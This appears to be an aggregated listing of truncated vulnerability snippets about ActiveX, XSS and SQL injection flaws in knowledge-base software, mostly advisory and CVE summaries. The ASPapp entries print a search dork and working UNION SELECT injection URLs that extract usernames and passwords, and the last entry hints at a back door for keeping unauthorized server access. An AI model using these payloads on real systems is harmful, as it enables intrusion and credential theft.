CanSecWest: Caution, community at play
CanSecWest, in beautiful Vancouver BC, is one of my favorite conferences each year. It’s a cozy little security con that brings together security researchers from all parts of the security ecosystem. Like a PhNeutral or a BlueHat, one never quite knows what to expect out of a CanSecWest, but we d...
Visual FoxPro vfp6r.dll ActiveX Control DoCmd command execution
Added: 12/19/2008. CVE: CVE-2008-0236. BID: 27205. OSVDB: 40380. Background: Visual FoxPro is a tool for developing database applications. Problem: The vfp6r.dll ActiveX control allows command execution when a user opens a web page which uses the DoCmd method. Resolution: Set the kill bit for class ID...
Unfixed XSS vulnerability at www.the-knowledge-brokers.com
Security researcher SaMTHG submitted on 12/10/2008 a cross-site scripting (XSS) vulnerability affecting www.the-knowledge-brokers.com, which at the time of submission ranked 3023025 on the web according to Alexa. We manually validated and published a mirror of this vulnerability on 05/11/2008...
Cross site scripting
Cross-site scripting (XSS) vulnerability in searcher.exe in Tornado Knowledge Retrieval System 4.2 and earlier allows remote attackers to inject arbitrary web script or HTML via the p parameter in a root action...
CVE-2008-5264
Cross-site scripting (XSS) vulnerability in searcher.exe in Tornado Knowledge Retrieval System 4.2 and earlier allows remote attackers to inject arbitrary web script or HTML via the p parameter in a root action...
CVE-2008-5264
The CVE-2008-5264 entry documents a Cross-site scripting (XSS) flaw in Tornado Knowledge Retrieval System versions 4.2 and earlier, affecting the searcher.exe component via the p parameter in a root action. Public sources do not provide additional exploit details, proof-of-exploit, affected versi...
LPViewer ActiveX Control url property buffer overflow
Added: 11/21/2008. CVE: CVE-2008-4384. BID: 31604. OSVDB: 48946. Background: The LPViewer ActiveX Control installs with the iseemedia ZOOM control viewer and allows viewing of images created with iseemedia software. Problem: A buffer overflow vulnerability allows command execution when a user opens a w...
SQL injection
Multiple SQL injection vulnerabilities in PHPKB Knowledge Base Software 1.5 Professional allow remote attackers to execute arbitrary SQL commands via the ID parameter to (1) email.php and (2) question.php, a different vector than CVE-2008-1909...
CVE-2008-5088
CVE-2008-5088 describes SQL injection vulnerabilities in PHPKB Knowledge Base Software 1.5 Professional. The vulnerability affects the ID parameter in two scripts, email.php and question.php, enabling remote attackers to execute arbitrary SQL commands. The connected documents provide concrete det...
ASPapp Knowledge Base - CatId SQL Injection (2)
ASPapp Knowledge Base - CatId SQL Injection 2 Dork - contentbycat.asp?contentid ''catid'' Exploit : contentbycat.asp?contentid=99999999&catid=-99887766 UNION SELECT 0,null,password,3,accesslevel,5,null,7,null,username from users Exploit 2 : contentbycat.asp?contentid=-99999999&catid=-99887766 uni...
ASPapp Knowledge Base - 'CatId' SQL Injection (2)
Dork - contentbycat.asp?contentid ''catid'' Exploit : contentbycat.asp?contentid=99999999&catid=-99887766 UNION SELECT 0,null,password,3,accesslevel,5,null,7,null,username from users Exploit 2 : contentbycat.asp?contentid=-99999999&catid=-99887766 union select...
phpkb-1.5-question.php.txt
PHPKB Knowledge Base Software v1.5 Professional question.php - SQL Injection Vulnerability http://www.knowledgebase-script.com ---------------------------------------------------------- Bug founded by d3v1l Date: 20.09.2007 [email protected]...
PHPKB 1.5 Professional Multiple Remote SQL Injection Vulnerabilities
No description provided by source. PHPKB Knowledge Base Software v1.5 Professional email.php - SQL Injection Vulnerability http://www.knowledgebase-script.com ---------------------------------------------------------- Bug founded by d3v1l Date: 20.09.2007 [email protected]...
PHPKB 1.5 Professional Multiple Remote SQL Injection Vulnerabilities
Exploit for unknown platform in category web applications ==================================================================== PHPKB 1.5 Professional Multiple Remote SQL Injection Vulnerabilities ==================================================================== PHPKB Knowledge Base Software v1...
PHPKB 1.5 Professional - Multiple SQL Injections
PHPKB Knowledge Base Software v1.5 Professional email.php - SQL Injection Vulnerability http://www.knowledgebase-script.com ---------------------------------------------------------- Bug founded by d3v1l Date: 20.09.2007 [email protected] ----------------------------------------------------------...
To prevent the administrator from deleting your account - vulnerability warning - the black bar safety net
! ! ! there are many of my friends have a server, but is the system administrator found, it will delete your number, Hey..there's a back door, but the system administrator the CMD prohibit the net . exe net 1. exe. Delete the number, and some friends that I can also manage! That the management of...